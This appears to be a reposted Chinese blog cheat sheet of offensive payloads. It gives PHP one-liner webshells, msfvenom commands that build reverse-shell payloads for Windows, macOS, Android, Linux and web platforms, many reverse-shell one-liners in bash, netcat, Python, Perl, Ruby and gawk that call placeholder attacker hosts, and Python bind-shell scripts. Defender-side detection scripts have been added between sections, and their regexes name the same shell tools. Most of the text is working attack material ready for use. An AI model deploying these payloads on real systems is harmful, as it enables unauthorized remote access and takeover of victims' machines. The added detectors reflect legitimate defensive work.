One-liner webshells

PHP

# Run PHP code
# File name: shell.php
# Usage: http://example.com/shell.php?cmd=phpinfo();
<?php eval($_REQUEST['cmd']);?>

# Run system commands
# File name: shell2.php
# Usage: http://example.com/shell2.php?lalala=whoami
<?php system($_REQUEST['lalala']);?>
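Added defender-side example (not part of the original post): a small scanner for the pattern both one-liners above share, an execution function wrapping a request superglobal. It scans a web root or, as shown, a few in-memory samples: the two shells above plus a benign file that uses $_GET normally and must not alert. The function list, the extra file extensions and the variable-function rule are my own choices.

```python
import re
from pathlib import Path
from typing import List, Tuple

# Functions that turn attacker-supplied input into code or command execution,
# and the superglobals through which a one-line webshell receives that input.
DANGEROUS_CALLS = r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_INPUT = r"\$_(REQUEST|GET|POST|COOKIE|SERVER)"

# Direct form:  eval($_REQUEST['cmd'])   system ( $_GET["x"] )
DIRECT_EXEC = re.compile(DANGEROUS_CALLS + r"\s*\(\s*" + REQUEST_INPUT, re.IGNORECASE)
# Variable-function form:  $f = $_GET['f']; $f($_GET['a']);
VAR_FUNC = re.compile(r"\$\w+\s*\(\s*" + REQUEST_INPUT)

def scan_source(name: str, source: str) -> List[Tuple[str, int, str]]:
    """Return (file, line number, matched text) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern in (DIRECT_EXEC, VAR_FUNC):
            m = pattern.search(line)
            if m:
                hits.append((name, lineno, m.group(0)))
                break  # one finding per line is enough for triage
    return hits

def scan_tree(root: str) -> List[Tuple[str, int, str]]:
    """Walk a web root and scan every PHP-like file (extension list is an assumption)."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in {".php", ".phtml", ".php5", ".php7", ".inc"}:
            try:
                hits.extend(scan_source(str(path), path.read_text(errors="replace")))
            except OSError:
                continue
    return hits

# Constructed samples: the two one-liners from the page plus a benign file.
SAMPLES = {
    "shell.php": "<?php eval($_REQUEST['cmd']);?>",
    "shell2.php": "<?php system($_REQUEST['lalala']);?>",
    "index.php": "<?php\n$name = htmlspecialchars($_GET['name'] ?? '');\necho \"Hello $name\";\n",
}

def scan_samples() -> List[Tuple[str, int, str]]:
    hits = []
    for name, src in SAMPLES.items():
        hits.extend(scan_source(name, src))
    return hits

if __name__ == "__main__":
    for f, n, txt in scan_samples():
        print(f"{f}:{n}: {txt}")
```

Run it over an upload directory with `scan_tree("/var/www/html")`; the regexes are deliberately loose (whitespace and case tolerant) because the point is to catch the shape, then review hits by hand.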

Reverse shell generation

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

Mac OS

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f macho -o payload.macho

Android

// the APK needs to be signed
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f apk -o payload.apk

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f elf -o payload.elf

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASPX

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f war -o payload.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.js

Python

msfvenom -p python/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.py

The generated (encoded) file:

import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))

After Base64 decoding:

import socket,struct
s=socket.socket(2,1)
s.connect(('x.x.x.x',2333))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
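Added example for incident triage, not from the original post: given a captured one-liner of the form shown above, it pulls out the Base64 string, decodes it, recovers the LHOST/LPORT from the connect() call, and checks whether the decoded code has the length-prefixed stage-0 shape (a 4-byte big-endian length, then that many bytes of code exec()ed with the socket in scope). The sample is the encoded payload from this page; it decodes to 0.0.0.0:2333, the values the author generated it with, rather than the x.x.x.x shown in the decoded listing.

```python
import base64
import re
from typing import Optional, Tuple

# The wrapper msfvenom puts around python payloads: exec(base64.b64decode('...'))
WRAPPER = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# The stage-0 connect call inside the decoded code: s.connect(('host',port))
CONNECT = re.compile(r"\.connect\(\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\s*\)")

# Sample copied from the encoded payload on this page.
SAMPLE = ("import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0"
          "KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0"
          "KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7"
          "J3MnOnN9KQo='))")

def unwrap_stager(one_liner: str) -> Optional[str]:
    """Return the decoded Python source hidden in an exec(b64decode(...)) wrapper."""
    m = WRAPPER.search(one_liner)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None

def extract_c2(one_liner: str) -> Optional[Tuple[str, int]]:
    """(host, port) from the decoded stager's connect() call, if any."""
    code = unwrap_stager(one_liner)
    if code is None:
        return None
    m = CONNECT.search(code)
    return (m.group(1), int(m.group(2))) if m else None

def is_length_prefixed_stager(code: str) -> bool:
    """True for the stage-0 shape above: read a 4-byte big-endian length ('>I'),
    receive that many bytes, then exec() them with the socket in scope."""
    c = code.replace('"', "'")
    return "struct.unpack('>I'" in c and "recv(" in c and "exec(" in c

def triage(one_liner: str) -> dict:
    """Everything an analyst wants from one captured stager, in one call."""
    code = unwrap_stager(one_liner)
    if code is None:
        return {"decoded": False}
    return {"decoded": True, "c2": extract_c2(one_liner),
            "staged": is_length_prefixed_stager(code), "code": code}

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("C2:", result["c2"], "| length-prefixed stager:", result["staged"])
    print(result["code"])
```

The C2 pair is what goes into a block rule or a network hunt; the "staged" flag tells the analyst that the real second stage was delivered over the socket and is not in the file, so disk forensics alone will not recover it.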

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.pl

Ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.rb

Lua

msfvenom -p cmd/unix/reverse_lua LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f raw -o payload.lua

Windows Shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f c

Linux Shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f c

Mac Shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=ATTACKING-IP LPORT=ATTACKING-PORT -f c

Automated payload generation tools

https://github.com/Screetsec/TheFatRat

Common reverse shells

Bash Reverse Shell

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

socat Reverse Shell

socat tcp:ip:port exec:'bash -i',pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
# (Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING-IP/443 0>&1'");?>
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
<?php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s >
<?php
$sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3");
?>

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

Another which works well for OpenBSD netcat rather than GNU nc:

mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Node.js Reverse Shell

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Retrying variant: tries the connection up to 10 times, then reads a 4-byte
# big-endian length followed by that many bytes of code and executes it.
import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('x.x.x.x',xx))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})

# Command-loop variant: each received chunk is run through a shell and the output sent back.
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('x.x.x.x',2333))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
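Added defender-side example, not from the original post: a classifier for process command lines (as an EDR or auditd execve record would carry them) covering the reverse-shell families listed in the sections above: bash /dev/tcp redirection, netcat -e, the mkfifo/mknod pipe, socat exec:, the python socket+dup2 pattern, PHP fsockopen and Perl Socket. Where the command line carries the remote host and port it extracts them as candidate C2 indicators. The rule names and the sample execution records are constructed.

```python
import re
from typing import List

# One rule per reverse-shell family from the cheat sheet above (names are my own).
# host/port named groups are captured where the command line carries them.
RULES = [
    ("bash_dev_tcp",    re.compile(r"/dev/tcp/(?P<host>[\w.\-]+)/(?P<port>\d+)")),
    ("netcat_exec",     re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-[a-zA-Z]*e\s*/bin/(ba)?sh")),
    ("fifo_pipe_shell", re.compile(r"\b(mkfifo|mknod)\b.*\|\s*/bin/(ba)?sh")),
    ("socat_exec",      re.compile(r"\bsocat\b.*\bexec:")),
    ("python_dup2",     re.compile(r"socket\.socket\(.*dup2\(")),
    ("php_fsockopen",   re.compile(r"fsockopen\(\s*[\"'](?P<host>[^\"']+)[\"']\s*,\s*(?P<port>\d+)")),
    ("perl_socket",     re.compile(r"\bperl\b.*\buse Socket\b.*\bexec\(")),
]

def classify(cmdline: str) -> List[dict]:
    """Return one finding per matching rule: {rule, host, port}."""
    findings = []
    for name, rx in RULES:
        m = rx.search(cmdline)
        if not m:
            continue
        groups = m.groupdict()
        findings.append({
            "rule": name,
            "host": groups.get("host"),
            "port": int(groups["port"]) if groups.get("port") else None,
        })
    return findings

# Constructed sample of process-execution records: timestamp, host, user, command line.
SAMPLE_EXECS = [
    ("2024-01-01T10:00:01", "web01", "www-data", "bash -i >& /dev/tcp/10.0.0.1/80 0>&1"),
    ("2024-01-01T10:00:02", "web01", "www-data", "ls -la /var/www/html"),
    ("2024-01-01T10:00:03", "web01", "www-data", "nc -e /bin/sh 10.0.0.1 80"),
    ("2024-01-01T10:00:04", "web02", "deploy",
     "mkfifo /tmp/f;nc 10.0.0.1 4444 0</tmp/f | /bin/sh -i 2>&1 | tee /tmp/f"),
    ("2024-01-01T10:00:05", "web02", "deploy",
     "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
     "s.connect((\"10.0.0.1\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
     "os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"),
]

def scan_execs(records) -> List[dict]:
    """Apply classify() to each record; returns the alerts an analyst would review."""
    alerts = []
    for ts, host, user, cmd in records:
        for f in classify(cmd):
            alerts.append({"ts": ts, "host": host, "user": user, "cmd": cmd, **f})
    return alerts

def c2_iocs(alerts) -> List[tuple]:
    """Distinct (host, port) pairs recovered from the alerts, for blocking and hunting."""
    seen = []
    for a in alerts:
        pair = (a["host"], a["port"])
        if a["host"] and pair not in seen:
            seen.append(pair)
    return seen

if __name__ == "__main__":
    found = scan_execs(SAMPLE_EXECS)
    for a in found:
        print(f'{a["ts"]} {a["host"]} {a["user"]} {a["rule"]}: {a["cmd"][:60]}')
    print("C2 candidates:", c2_iocs(found))
```

Command-line matching is a first-pass signal only: the netcat and socat rules depend on argument order and the fifo rule on a literal `/bin/sh`, so pair these with egress monitoring (a web server process opening an outbound TCP connection) rather than relying on them alone.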

Bind Shell

A few points to note about interactive bind (forward-connect) shells:

  1. On both Linux and Windows, an interactive session requires a single persistent shell process. You cannot spawn a fresh shell process for every received command and run the command there.

  2. On Windows, cmd.exe's /K switch keeps cmd running after the command, while /c exits as soon as the command completes; note the difference.

Windows version

# Python 2 syntax (print statement); cmd.exe /K keeps one shell alive for the whole session
from socket import *
import subprocess
import os, threading

def send(talk, proc):
    import time
    while True:
        msg = proc.stdout.readline()
        talk.send(msg)

if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',23333))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    t = threading.Thread(target = send, args = (talk, proc))
    t.setDaemon(True)
    t.start()
    while True:
        cmd=talk.recv(1024)
        proc.stdin.write(cmd)
        proc.stdin.flush()
    server.close()

Linux version

# Python 2 syntax; the socket is handed to /bin/sh directly as its stdin/stdout/stderr
from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',11))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    # argv list form, so shell=True is not used (with shell=True only "/bin/sh" would reach the shell)
    proc = subprocess.Popen(["/bin/sh","-i"],stdin=talk,stdout=talk, stderr=talk)

Once it is running, connect to it from the attacking machine.
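Added defender-side example, not from the original post: a check for bind shells like the two scripts above, which leave a shell or interpreter owning a listening TCP socket. It parses the rows of `ss -tlnp` (Linux) and flags listeners whose owning process is a shell or scripting interpreter, noting whether the socket is bound beyond loopback. The `ss` output below is constructed to mirror the ports the scripts above use (23333 and 11); the interpreter list is an assumption to tune per host role.

```python
import re
from typing import List

# Processes that should not normally own a listening TCP socket on a server.
# This list is an assumption; tune it per host role (a Django dev server is python too).
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "python", "python2", "python3",
              "perl", "ruby", "php", "gawk", "nc", "ncat", "socat"}
LOOPBACK = {"127.0.0.1", "::1", "[::1]"}

# One data row of `ss -tlnp`, e.g.
# LISTEN 0 5 0.0.0.0:23333 0.0.0.0:* users:(("python",pid=4242,fd=3))
# Only the first process in users:(...) is read; that is enough for this check.
ROW = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)'
)

def parse_ss(ss_output: str) -> List[dict]:
    """Parse listening sockets out of `ss -tlnp` text; the header and odd rows are skipped."""
    rows = []
    for line in ss_output.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        addr, port = m.group("local").rsplit(":", 1)  # handles [::]:22 as well
        rows.append({"addr": addr, "port": int(port),
                     "process": m.group("proc"), "pid": int(m.group("pid"))})
    return rows

def suspicious_listeners(ss_output: str) -> List[dict]:
    """Listeners owned by a shell or interpreter; 'exposed' means bound beyond loopback."""
    found = []
    for r in parse_ss(ss_output):
        if r["process"].lower() in SHELL_LIKE:
            r["exposed"] = r["addr"] not in LOOPBACK
            found.append(r)
    return found

# Constructed sample mirroring the two bind-shell scripts above (ports 23333 and 11).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      5      0.0.0.0:23333       0.0.0.0:*         users:(("python",pid=4242,fd=3))
LISTEN 0      5      0.0.0.0:11          0.0.0.0:*         users:(("python",pid=4301,fd=3))
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=600,fd=7))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))
"""

if __name__ == "__main__":
    for r in suspicious_listeners(SAMPLE_SS):
        print(f'pid {r["pid"]} {r["process"]} listening on {r["addr"]}:{r["port"]}'
              f' ({"all interfaces" if r["exposed"] else "loopback only"})')
```

On a live host feed it the real output (`ss -tlnp` needs root to show other users' processes) and follow up any hit with `ls -l /proc/<pid>/fd` and the process's command line; port 11 in the sample is also a reminder that low ports only mean the listener was started with privileges.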

Gawk Reverse Shell

gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'
#!/usr/bin/gawk -f

BEGIN {
  Port    =       8080
  Prompt  =       "bkd> "

  Service = "/inet/tcp/" Port "/0/0"
  while (1) {
    do {
      printf Prompt |& Service
      Service |& getline cmd
      if (cmd) {
        while ((cmd |& getline) > 0)
          print $0 |& Service
        close(cmd)
      }
    } while (cmd != "exit")
    close(Service)
  }
}

Kali Web Shells

The following scripts ship with Kali Linux under /usr/share/webshells; they are only usable when they can be uploaded, injected, or otherwise transferred to the target machine.

Kali PHP Web Shells

php-reverse-shell.php

Pen Test Monkey – PHP Reverse Shell

php-findsock-shell.php & findsock.c

Pen Test Monkey, Findsock Shell. Build with gcc -o findsock findsock.c (be mindful of the target server's architecture); execute with netcat, not a browser: nc -v target 80

simple-backdoor.php

PHP backdoor, useful for command execution if upload / code injection is possible. Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

php-backdoor.php

Larger PHP shell, with a text input box for command execution.

Kali Perl Reverse Shell

perl-reverse-shell.pl

Pen Test Monkey – Perl Reverse Shell

perlcmd.cgi

Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

cfexec.cfm

Cold Fusion Shell – aka CFM Shell

Kali ASP Shell

Classic ASP Reverse Shell + CMD shells: /usr/share/webshells/asp/

Kali ASPX Shells

ASP.NET reverse shells within Kali: /usr/share/webshells/aspx/

Kali JSP Reverse Shell

Kali JSP Reverse Shell: /usr/share/webshells/jsp/jsp-reverse.jsp

Copyright notice: this is an original article by wudiaries, released under the CC 4.0 BY-SA license; when reposting, include a link to the original and this notice.
Original link: https://www.cnblogs.com/wudiaries/p/webshell.html